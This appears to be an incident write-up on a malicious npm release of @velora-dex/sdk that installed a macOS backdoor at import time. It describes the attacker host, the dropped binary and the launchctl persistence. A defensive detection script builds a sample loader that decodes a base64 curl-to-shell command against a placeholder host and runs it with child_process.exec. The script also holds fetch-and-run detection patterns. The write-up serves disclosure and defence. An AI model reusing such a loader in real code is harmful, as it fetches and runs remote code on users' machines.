Open Source · 2026-04-07 · 0 days · Backdoor

VeloraDEX SDK installed macOS backdoor

@velora-dex/sdk 9.4.1 was published directly to npm with no matching source commit. Importing it fetched a macOS backdoor and registered launchctl persistence.

Story

On April 7, 2026, an attacker pushed a malicious release of @velora-dex/sdk, the JavaScript toolkit used to integrate with the VeloraDEX decentralized exchange, directly to npm without ever touching the corresponding GitHub repository. The compromised version, 9.4.1, was a registry-only attack: developers reviewing the project's default branch would have seen nothing wrong.

Aikido researcher Charlie Eriksen reported the package on the project's GitHub tracker, and StepSecurity published a teardown. The diff in the tarball was small. package.json carried the version bump, and dist/index.js gained three prepended lines that base64-decoded a shell command and ran it through child_process.exec() as soon as application code imported the SDK. The command used curl to pull install.sh from 89.36.224.5, suppressing all output.
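The change described above is small enough to catch mechanically if a release is diffed against its predecessor before it is adopted. As an added example (not code from the advisory, StepSecurity, Aikido or the VeloraDEX project), the following Node.js script diffs a package's entry file against the previous release and flags added lines that decode a string literal at module load and hand it to a process-spawning API. The sample file contents, the loader command with its RFC 5737 placeholder host 203.0.113.10, and the function names are all constructed for the example; the real 9.4.1 payload is not reproduced.

```javascript
// Added example (not code from the advisory, StepSecurity, Aikido or the
// VeloraDEX project): flag newly added lines in a package entry file that
// decode a literal at import time and pass it to a process-spawning API.
// Sample inputs are constructed; the placeholder host is an RFC 5737 address.

const SPAWN_APIS = /\b(child_process|exec(Sync)?|execFile(Sync)?|spawn(Sync)?)\b/;
const DECODE_APIS = /Buffer\.from\([^)]*['"]base64['"]\)|\batob\(/;
const BASE64_LITERAL = /['"`]([A-Za-z0-9+/]{16,}={0,2})['"`]/g;
const SHELL_FETCH = /\b(curl|wget)\b|\|\s*(ba|z)?sh\b|\bsh\s+-c\b/;

// Decode every long base64-looking string literal on a line (best effort;
// Buffer.from is lenient, so non-base64 text just yields garbage that
// will not match SHELL_FETCH).
function decodeLiterals(line) {
  return [...line.matchAll(BASE64_LITERAL)].map((m) =>
    Buffer.from(m[1], 'base64').toString('utf8'),
  );
}

// Lines present in the new file but not in the previous release's file.
function addedLines(previous, current) {
  const seen = new Set(previous.split('\n'));
  return current
    .split('\n')
    .map((text, i) => ({ line: i + 1, text }))
    .filter((l) => !seen.has(l.text));
}

// Scan only what changed: a registry-only release that prepends a loader
// shows up as a handful of added lines at the top of the entry file, and
// those lines run at require() time, so --ignore-scripts never sees them.
function scanEntryFile(previous, current) {
  const findings = [];
  for (const { line, text } of addedLines(previous, current)) {
    const reasons = [];
    if (SPAWN_APIS.test(text)) reasons.push('process-spawning API');
    if (DECODE_APIS.test(text)) reasons.push('runtime base64 decoding');
    for (const decoded of decodeLiterals(text)) {
      if (SHELL_FETCH.test(decoded)) {
        reasons.push(`decoded literal pipes a download into a shell: ${decoded}`);
      }
    }
    if (reasons.length > 0) findings.push({ line, text, reasons });
  }
  return findings;
}

// Constructed sample: the previous release's entry file ...
const PREVIOUS_INDEX = [
  '"use strict";',
  'const { ethers } = require("ethers");',
  'function getQuote() { return {}; }',
  'module.exports = { getQuote };',
].join('\n');

// ... and a new release that prepends three loader lines in the shape the
// advisory describes. The command is a constructed stand-in, not the real one.
const LOADER_B64 = Buffer.from(
  'curl -s http://203.0.113.10/install.sh | sh',
  'utf8',
).toString('base64');
const CURRENT_INDEX = [
  'const cp = require("child_process");',
  `const cmd = Buffer.from("${LOADER_B64}", "base64").toString();`,
  'cp.exec(cmd, () => {});',
  PREVIOUS_INDEX,
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanEntryFile(PREVIOUS_INDEX, CURRENT_INDEX)) {
    console.log(`line ${f.line}: ${f.reasons.join('; ')}`);
  }
}
```

Running it reports the three prepended lines and nothing else; the unchanged lines from the earlier release are skipped entirely, which is what keeps the check cheap enough to run on every version bump of every dependency. The base64 heuristic is deliberately narrow (long literals only), so a real pipeline would pair it with a check that the npm version has a matching git tag, the gap this incident exploited.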

On macOS, the script created ~/Library/Application Support/com.apple.Terminal/, fetched either an ARM64 or Intel build of a binary named profiler from the same host, made it executable, and registered it as a persistent user service through launchctl submit -l zsh.profiler. The naming borrowed from Apple's own bundle conventions to blend into a developer laptop.

The trigger here was not an npm lifecycle hook. Passing --ignore-scripts, a common defense against malicious postinstall payloads, did nothing, because the malicious code ran at require('@velora-dex/sdk') time. StepSecurity told downstream operators to pin to 9.4.0 or earlier, remove the launchctl service and the dropped binary, and rotate any secret reachable from an affected machine.

Affected Artifacts

Incident Context

Motive: Backdoor
Cause: Compromised Account Credentials
Transitive: Yes

External References

Source record: oss/attacks/velora-dex-sdk/meta.yaml